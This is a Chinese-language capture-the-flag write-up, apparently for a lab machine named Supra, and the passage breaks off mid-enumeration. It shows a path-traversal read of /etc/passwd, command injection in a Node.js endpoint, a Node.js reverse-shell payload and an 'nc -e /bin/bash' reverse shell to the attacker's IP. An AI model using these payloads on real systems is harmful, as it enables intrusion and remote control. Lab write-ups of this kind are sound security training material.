"http:\/\/192.168.10.103\/51118853.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/Sell_Mat": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/Sell_Mat.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 412103 \/ 882244 (46.71%)[ERROR] Get "http:\/\/192.168.10.103\/90368.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/coolhand": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/coolhand.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 464470 \/ 882244 (52.65%)[ERROR] Get "http:\/\/192.168.10.103\/95843": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/163958.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/105473": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/95843.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/95843.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 487735 \/ 882244 (55.28%)[ERROR] Get "http:\/\/192.168.10.103\/51396.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 489683 \/ 882244 (55.50%)[ERROR] Get "http:\/\/192.168.10.103\/81758.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/38348.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/42761": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/42761.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/51397": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/38348.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n\nProgress: 493426 \/ 882244 (55.93%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 493493 \/ 882244 (55.94%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u626b\u4e0d\u51fa\u6765\u62c9\u5012\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text \n\n[Debian Logo] Apache2 Debian Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Debian systems. If you can read this page,\nit means that the Apache HTTP server installed at this site is working\nproperly. You should replace this file (located at \/var\/www\/html\/index.html)\nbefore continuing to operate your HTTP server.\nIf you are a normal user of this web site and don't know what this page is\nabout, this probably means that the site is currently unavailable due to\nmaintenance. If the problem persists, please contact the site's administrator.\nConfiguration Overview<\/code><\/pre>\n\u5c31\u662f\u4e00\u4e2aapache\u9ed8\u8ba4\u9875\u9762\u3002<\/p>\n
\u654f\u611f\u7aef\u53e3<\/h3>\n
\u770b\u4e00\u4e0b\u8fd9\u4e2a4000<\/code>\u7aef\u53e3\u600e\u4e48\u6d4b\u8bd5\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u627e\u5230\uff1a<\/p>\n
<script>\n function ping() {\n ip = document.getElementById("pingIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/ping\/" + ip, false);\n xhttp.send();\n document.getElementById("pingResult").innerHTML = xhttp.responseText;\n }\n\n function portscan() {\n ip = document.getElementById("portscanIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/portscan\/" + ip, false);\n xhttp.send();\n document.getElementById("portscanResult").innerHTML = xhttp.responseText;\n }\n\n function whois() {\n ip = document.getElementById("whoisIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/whois\/" + ip, false);\n xhttp.send();\n document.getElementById("whoisResult").innerHTML = xhttp.responseText;\n }\n\n function base64e() {\n data = document.getElementById("base64eIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/base64\/encode\/" + data, false);\n xhttp.send();\n document.getElementById("base64eResult").innerHTML = xhttp.responseText;\n }\n\n function base64d() {\n data = document.getElementById("base64dIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/base64\/decode\/" + data, false);\n xhttp.send();\n document.getElementById("base64dResult").innerHTML = xhttp.responseText;\n }\n\n function passgen() {\n\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/generate-password", false);\n xhttp.send();\n document.getElementById("passgenResult").innerHTML = xhttp.responseText;\n }\n <\/script><\/code><\/pre>\n\u53d1\u73b0\u6587\u4ef6\u4e0a\u4f20\u63a5\u53e3\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u53cd\u5f39shell\u6587\u4ef6\uff0c\u5148\u6d4b\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP:4000\/var\/www\/api\/uploads\/test.txt | html2text\nCannot GET \/var\/www\/api\/uploads\/test.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP:4000\/uploads\/test.txt | html2text \njust a test......<\/code><\/pre>\n\u56e0\u4e3a\u8fd9\u4e2a\u7f51\u9875\u662fnodejs<\/code>\u521b\u5efa\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u76f8\u5173\u53cd\u5f39 shell\uff0c\u4f46\u662f\u53d1\u73b0\u5e76\u672a\u89e3\u6790\uff1a<\/p>\n(function(){\n var net = require("net"),\n cp = require("child_process"),\n sh = cp.spawn("bash", []);\n var client = new net.Socket();\n client.connect(1234, "192.168.10.104", function(){\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n return \/a\/; \/\/ Prevents the Node.js application from crashing\n})();<\/code><\/pre>\nLFI<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/$IP:4000\/uploads\/..\/..\/..\/..\/etc\/passwd" | html2text \nCannot GET \/etc\/passwd\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/$IP:4000\/uploads\/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd" \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:114:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nit404:x:1000:1000:it404,,,:\/home\/it404:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:107:115::\/var\/spool\/exim4:\/usr\/sbin\/nologin<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\u8bfb\u53d6\u5176\u4ed6\u4e1c\u897f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ echo -n "..\/..\/..\/..\/..\/etc\/passwd" | xxd -p | tr -d '\\n' | sed 's\/\\(..\\)\/%\\1\/g'\n%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/$IP:4000\/uploads\/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64" \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:114:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nit404:x:1000:1000:it404,,,:\/home\/it404:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:107:115::\/var\/spool\/exim4:\/usr\/sbin\/nologin<\/code><\/pre>\n\u60f3\u7740\u641e\u4e2a\u811a\u672c\u8dd1\u4e00\u4e0b\uff1a<\/p>\n
#!\/bin\/bash\nwhile IFS= read -r line; do\n urlcode=$(echo -n "$line" | xxd -p | tr -d '\\n' | sed 's\/\\(..\\)\/%\\1\/g')\n echo "[+] payload:$line" >> result.txt\n echo "[+] url_payload:$urlcode" >> result.txt\n curl -s "http:\/\/192.168.10.103:4000\/uploads\/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f$urlcode" >> result.txt\ndone < \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-linux.txt<\/code><\/pre>\n\u989d\uff0c\u4e0d\u80fd\u8bf4\u6ca1\u6709\u7528\uff0c\u53ea\u80fd\u8bf4\u4e00\u70b9\u7528\u4e0d\u5230\u3002\u3002\u3002<\/p>\n
\u770b\u5230\u4e4b\u524d\u7ed9\u5230\u7684\u76ee\u5f55\uff0c\u7ffb\u4e00\u4e0bapp.js<\/code>:<\/p>\n# \/var\/www\/api\/uploads\/test.txt\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/uploads\/..%2Fapp.js"\nvar express = require('express');\nconst { exec } = require('child_process')\nconst { base64encode, base64decode } = require('nodejs-base64');\nconst whois = require('node-xwhois');\nconst ipRegex = require('ip-regex');\nvar generator = require('generate-password');\nconst fs = require('fs')\nvar multer = require('multer');\n\nvar storage = multer.diskStorage({\n destination: function (req, file, callback) {\n callback(null, '.\/uploads');\n },\n filename: function (req, file, callback) {\n callback(null, file.originalname);\n }\n});\n\nvar upload = multer({ storage: storage }).single('userFile');\nvar app = express();\napp.set('view engine', 'ejs');\n\napp.get('\/', (req, res) => {\n\n res.render('home');\n\n});\n\napp.get('\/ping\/:ip', (req, res) => {\n\n ip = req.params.ip\n if (ipRegex({ exact: true }).test(ip)) {\n\n exec("ping -c 3 ".concat(ip), (error, stdout, stderr) => {\n if (error) {\n\n }\n if (stderr) {\n\n }\n console.log(`stdout: ${stdout}`);\n res.send(`stdout: ${stdout}`)\n });\n }\n else {\n res.send("This is not an IP");\n }\n\n});\n\napp.get('\/portscan\/:ip', (req, res) => {\n\n ip = req.params.ip\n\n if (ipRegex({ exact: true }).test(ip)) {\n\n exec("nmap -p 21,22,443,80,8080 -T4 ".concat(ip), (error, stdout, stderr) => {\n if (error) {\n\n }\n if (stderr) {\n\n }\n console.log(`stdout: ${stdout}`);\n res.send(`stdout: ${stdout}`)\n });\n }\n else {\n res.send("This is not an IP");\n }\n\n});\n\napp.get('\/whois\/:ip', (req, res) => {\n\n ip = req.params.ip\n\n if (ipRegex({ exact: true }).test(ip)) {\n\n whois.whois(ip)\n .then(data => res.send(data))\n .catch(err => console.log(err));\n }\n else {\n res.send("This is not an IP");\n }\n\n});\n\napp.get('\/base64\/decode\/:data', (req, res) => {\n\n data = req.params.data\n base64decoded = base64decode(data)\n res.send(base64decoded)\n});\n\napp.get('\/base64\/encode\/:data', (req, res) => {\n\n data = req.params.data\n base64encoded = base64encode(data)\n res.send(base64encoded)\n});\n\napp.get('\/generate-password', (req, res) => {\n\n var password = generator.generate({\n length: 18,\n numbers: true,\n symbols: true\n });\n\n res.send(password)\n});\n\napp.get('\/uploads\/:filename', (req, res) => {\n\n finalPath = __dirname.concat("\/uploads\/").concat(req.params.filename)\n console.log(finalPath)\n fs.readFile(finalPath, 'utf8', (err, data) => {\n res.end(data);\n })\n});\n\napp.post('\/file', function (req, res) {\n upload(req, res, function (err) {\n\n if (req.fileValidationError) {\n return res.send(req.fileValidationError);\n }\n else if (!req.file) {\n return res.send('Please select a file to upload');\n }\n else if (err instanceof multer.MulterError) {\n return res.send(err);\n }\n else if (err) {\n return res.send(err);\n }\n\n exec("md5sum ".concat(__dirname).concat("\/uploads\/").concat(req.file.filename), (error, stdout, stderr) => {\n console.log(`stdout: ${stdout}`);\n res.end(`stdout: ${stdout}`)\n });\n });\n});\n\napp.get('\/internal-processes-v1-display', function (req, res) {\n\n uid = req.query.uid\n console.log(uid)\n exec("ps aux | grep ".concat(uid), (error, stdout, stderr) => {\n console.log(`stdout: ${stdout}`);\n res.end(`stdout: ${stdout} :: ${uid}`)\n });\n\n});\n\napp.listen(4000, function () {\n console.log('listening to port 4000')\n});<\/code><\/pre>\n\u53d1\u73b0\u4e00\u4e2a\u9690\u85cf\u7684api\u63a5\u53e3\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/internal-processes-v1-display" \nstdout: www-data 795 0.0 0.0 2420 584 ? S 02:14 0:00 \/bin\/sh -c ps aux | grep undefined\nwww-data 797 0.0 0.0 6180 712 ? S 02:14 0:00 grep undefined\n :: undefined<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root"\nstdout: root 1 0.2 0.4 98140 10088 ? Ss 02:08 0:01 \/sbin\/init\nroot 2 0.0 0.0 0 0 ? S 02:08 0:00 [kthreadd]\nroot 3 0.0 0.0 0 0 ? I< 02:08 0:00 [rcu_gp]\nroot 4 0.0 0.0 0 0 ? I< 02:08 0:00 [rcu_par_gp]\nroot 5 0.2 0.0 0 0 ? I 02:08 0:01 [kworker\/0:0-events]\nroot 6 0.0 0.0 0 0 ? I< 02:08 0:00 [kworker\/0:0H-events_highpri]\nroot 8 0.0 0.0 0 0 ? I 02:08 0:00 [kworker\/u2:0-ext4-rsv-conversion]\nroot 9 0.0 0.0 0 0 ? I< 02:08 0:00 [mm_percpu_wq]\nroot 10 0.0 0.0 0 0 ? S 02:08 0:00 [rcu_tasks_rude_]\nroot 11 0.0 0.0 0 0 ? S 02:08 0:00 [rcu_tasks_trace]\nroot 12 0.0 0.0 0 0 ? S 02:08 0:00 [ksoftirqd\/0]\nroot 13 0.0 0.0 0 0 ? I 02:08 0:00 [rcu_sched]\nroot 14 0.0 0.0 0 0 ? S 02:08 0:00 [migration\/0]\nroot 15 0.0 0.0 0 0 ? S 02:08 0:00 [cpuhp\/0]\nroot 17 0.0 0.0 0 0 ? S 02:08 0:00 [kdevtmpfs]\nroot 18 0.0 0.0 0 0 ? I< 02:08 0:00 [netns]\nroot 19 0.0 0.0 0 0 ? S 02:08 0:00 [kauditd]\nroot 20 0.0 0.0 0 0 ? S 02:08 0:00 [khungtaskd]\nroot 21 0.0 0.0 0 0 ? S 02:08 0:00 [oom_reaper]\nroot 22 0.0 0.0 0 0 ? I< 02:08 0:00 [writeback]\nroot 23 0.0 0.0 0 0 ? S 02:08 0:00 [kcompactd0]\nroot 24 0.0 0.0 0 0 ? SN 02:08 0:00 [ksmd]\nroot 25 0.0 0.0 0 0 ? SN 02:08 0:00 [khugepaged]\nroot 43 0.0 0.0 0 0 ? I< 02:08 0:00 [kintegrityd]\nroot 44 0.0 0.0 0 0 ? I< 02:08 0:00 [kblockd]\nroot 45 0.0 0.0 0 0 ? I< 02:08 0:00 [blkcg_punt_bio]\nroot 46 0.0 0.0 0 0 ? I< 02:08 0:00 [edac-poller]\nroot 47 0.0 0.0 0 0 ? I< 02:08 0:00 [devfreq_wq]\nroot 48 0.0 0.0 0 0 ? I< 02:08 0:00 [kworker\/0:1H-kblockd]\nroot 49 0.0 0.0 0 0 ? S 02:08 0:00 [kswapd0]\nroot 50 0.0 0.0 0 0 ? I< 02:08 0:00 [kthrotld]\nroot 51 0.0 0.0 0 0 ? I< 02:08 0:00 [acpi_thermal_pm]\nroot 52 0.0 0.0 0 0 ? I< 02:08 0:00 [ipv6_addrconf]\nroot 62 0.0 0.0 0 0 ? I< 02:08 0:00 [kstrp]\nroot 65 0.0 0.0 0 0 ? I< 02:08 0:00 [zswap-shrink]\nroot 66 0.0 0.0 0 0 ? I< 02:08 0:00 [kworker\/u3:0]\nroot 109 0.0 0.0 0 0 ? I< 02:08 0:00 [ata_sff]\nroot 110 0.0 0.0 0 0 ? S 02:08 0:00 [scsi_eh_0]\nroot 111 0.0 0.0 0 0 ? S 02:08 0:00 [scsi_eh_1]\nroot 112 0.0 0.0 0 0 ? I< 02:08 0:00 [scsi_tmf_0]\nroot 113 0.0 0.0 0 0 ? I< 02:08 0:00 [scsi_tmf_1]\nroot 114 0.0 0.0 0 0 ? S 02:08 0:00 [scsi_eh_2]\nroot 115 0.0 0.0 0 0 ? I< 02:08 0:00 [scsi_tmf_2]\nroot 116 0.0 0.0 0 0 ? I 02:08 0:00 [kworker\/u2:2-flush-8:0]\nroot 118 0.0 0.0 0 0 ? I 02:08 0:00 [kworker\/0:3-ata_sff]\nroot 152 0.0 0.0 0 0 ? S 02:08 0:00 [jbd2\/sda1-8]\nroot 153 0.0 0.0 0 0 ? I< 02:08 0:00 [ext4-rsv-conver]\nroot 187 0.0 0.6 48224 12332 ? Ss 02:09 0:00 \/lib\/systemd\/systemd-journald\nroot 214 0.0 0.2 22060 5700 ? Ss 02:09 0:00 \/lib\/systemd\/systemd-udevd\nroot 283 0.0 0.0 0 0 ? I< 02:09 0:00 [cryptd]\nroot 284 0.0 0.0 0 0 ? S 02:09 0:00 [irq\/18-vmwgfx]\nroot 285 0.0 0.0 0 0 ? I< 02:09 0:00 [ttm_swap]\nroot 286 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc0]\nroot 287 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc1]\nroot 288 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc2]\nroot 289 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc3]\nroot 290 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc4]\nroot 291 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc5]\nroot 292 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc6]\nroot 293 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc7]\nroot 381 0.0 0.2 99824 5828 ? Ssl 02:09 0:00 \/sbin\/dhclient -4 -v -i -pf \/run\/dhclient.enp0s3.pid -lf \/var\/lib\/dhcp\/dhclient.enp0s3.leases -I -df \/var\/lib\/dhcp\/dhclient6.enp0s3.leases enp0s3\nroot 382 0.0 0.1 6684 2848 ? Ss 02:09 0:00 \/usr\/sbin\/cron -f\nroot 386 0.0 0.2 220740 6032 ? Ssl 02:09 0:00 \/usr\/sbin\/rsyslogd -n -iNONE\nroot 387 0.0 0.1 6756 3116 ? Ss 02:09 0:00 \/bin\/bash \/root\/.s\/starts.sh\nroot 389 0.0 0.2 21536 5528 ? Ss 02:09 0:00 \/lib\/systemd\/systemd-logind\nroot 390 0.0 0.2 14560 4944 ? Ss 02:09 0:00 \/sbin\/wpa_supplicant -u -s -O \/run\/wpa_supplicant\nroot 416 0.0 0.4 16396 9844 ? S 02:09 0:00 python3 socket-root.py\nroot 433 0.0 0.0 5784 1628 tty1 Ss+ 02:09 0:00 \/sbin\/agetty -o -p -- \\u --noclear tty1 linux\nroot 697 0.0 0.3 13292 7104 ? Ss 02:09 0:00 sshd: \/usr\/sbin\/sshd -D [listener] 0 of 10-100 startups\nroot 710 0.0 0.9 193784 19692 ? Ss 02:09 0:00 \/usr\/sbin\/apache2 -k start\nroot 794 0.0 0.0 0 0 ? I 02:14 0:00 [kworker\/0:1-ata_sff]\nroot 798 0.0 0.0 0 0 ? I 02:15 0:00 [kworker\/u2:1-flush-8:0]\nwww-data 799 0.0 0.0 2420 576 ? S 02:16 0:00 \/bin\/sh -c ps aux | grep root\nwww-data 801 0.0 0.0 6312 652 ? S 02:16 0:00 grep root\n :: root<\/code><\/pre>\n\u5c1d\u8bd5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root|whoami;id"\nstdout: www-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n :: root|whoami;id<\/code><\/pre>\n\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root|nc+-e+\/bin\/bash+192.168.10.104+1234"<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@Supra:\/var\/www\/api$ ls -la\ntotal 132\ndrwxr-xr-x 5 root root 4096 Oct 10 2021 .\ndrwxr-xr-x 4 root root 4096 Oct 10 2021 ..\n-rw-r--r-- 1 root root 3666 Oct 10 2021 app.js\ndrwxr-xr-x 149 root root 4096 Oct 12 2021 node_modules\n-rw-r--r-- 1 root root 432 Oct 12 2021 package.json\n-rw-r--r-- 1 root root 101932 Oct 12 2021 package-lock.json\n-rwxr-xr-x 1 root root 24 Oct 10 2021 start.sh\ndrwxr-xr-x 2 www-data www-data 4096 Aug 9 00:20 uploads\ndrwxr-xr-x 2 root root 4096 Oct 10 2021 views\n(remote) www-data@Supra:\/var\/www\/api$ cat start.sh \n#!\/bin\/bash\nnode app.js\n(remote) www-data@Supra:\/var\/www\/api$ cat package.json \n{\n "name": "api",\n "version": "1.0.0",\n "description": "",\n "main": "app.js",\n "scripts": {\n "test": "echo \\"Error: no test specified\\" && exit 1"\n },\n "keywords": [],\n "author": "",\n "license": "ISC",\n "dependencies": {\n "ejs": "^3.1.6",\n "express": "^4.17.1",\n "generate-password": "^1.6.1",\n "ip-regex": "^4.3.0",\n "multer": "^1.4.3",\n "node-xwhois": "^2.0.10",\n "nodejs-base64": "^2.0.0"\n }\n}\n(remote) www-data@Supra:\/var\/www\/api$ sudo -l\nbash: sudo: command not found\n(remote) www-data@Supra:\/var\/www\/api$ ls -la \/home\/it404\/\ntotal 24\ndrwxr-xr-x 2 it404 it404 4096 Oct 12 2021 .\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 ..\n-rw-r--r-- 1 it404 it404 220 Oct 6 2021 .bash_logout\n-rw-r--r-- 1 it404 it404 3526 Oct 6 2021 .bashrc\n-rw-r-----+ 1 root root 32 Oct 12 2021 local.txt\n-rw-r--r-- 1 it404 it404 807 Oct 6 2021 .profile<\/code><\/pre>\nACls\u67e5\u770b\u6587\u4ef6<\/h3>\n
\u770b\u5230\u4e00\u4e2a\u52a0\u53f7\uff0c\u660e\u663e\u662fAcls\u6743\u9650\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u5185\u5bb9\uff1a<\/p>\n
(remote) www-data@Supra:\/home\/it404$ getfacl local.txt \n# file: local.txt\n# owner: root\n# group: root\nuser::rw-\nuser:it404:r--\ngroup::---\nmask::r--\nother::---\n(remote) www-data@Supra:\/home\/it404$ cat \/etc\/group | grep user\nusers:x:100:\n(remote) www-data@Supra:\/home\/it404$ cat \/etc\/group | grep mask<\/code><\/pre>\n\u53cd\u5e8f\u5217\u5316+yaml\u63d0\u5347\u7528\u6237\u6743\u9650<\/h3>\n
\u6ca1\u6536\u83b7\uff0c\u5148\u8bb0\u4e0b\uff0c\u67e5\u770b\u5176\u4ed6\u4fe1\u606f\uff1a<\/p>\n
(remote) www-data@Supra:\/home\/it404$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/sbin\/exim4\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/mount\n(remote) www-data@Supra:\/home\/it404$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@Supra:\/home\/it404$ ss -tlunp\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process \nudp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* \ntcp LISTEN 0 128 127.0.0.1:8081 0.0.0.0:* \ntcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* \ntcp LISTEN 0 20 127.0.0.1:25 0.0.0.0:* \ntcp LISTEN 0 511 *:80 *:* \ntcp LISTEN 0 128 [::]:22 [::]:* \ntcp LISTEN 0 20 [::1]:25 [::]:* \ntcp LISTEN 0 511 *:4000 *:* users:(("node",pid=415,fd=18))<\/code><\/pre>\n\u53d1\u73b0\u5185\u90e8\u5f00\u653e\u4e86\u4e00\u4e2a25<\/code>\u53f7\u7aef\u53e3\u4ee5\u53ca8081<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u5565\u6d88\u606f\uff1a<\/p>\n(remote) www-data@Supra:\/home\/it404$ ip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 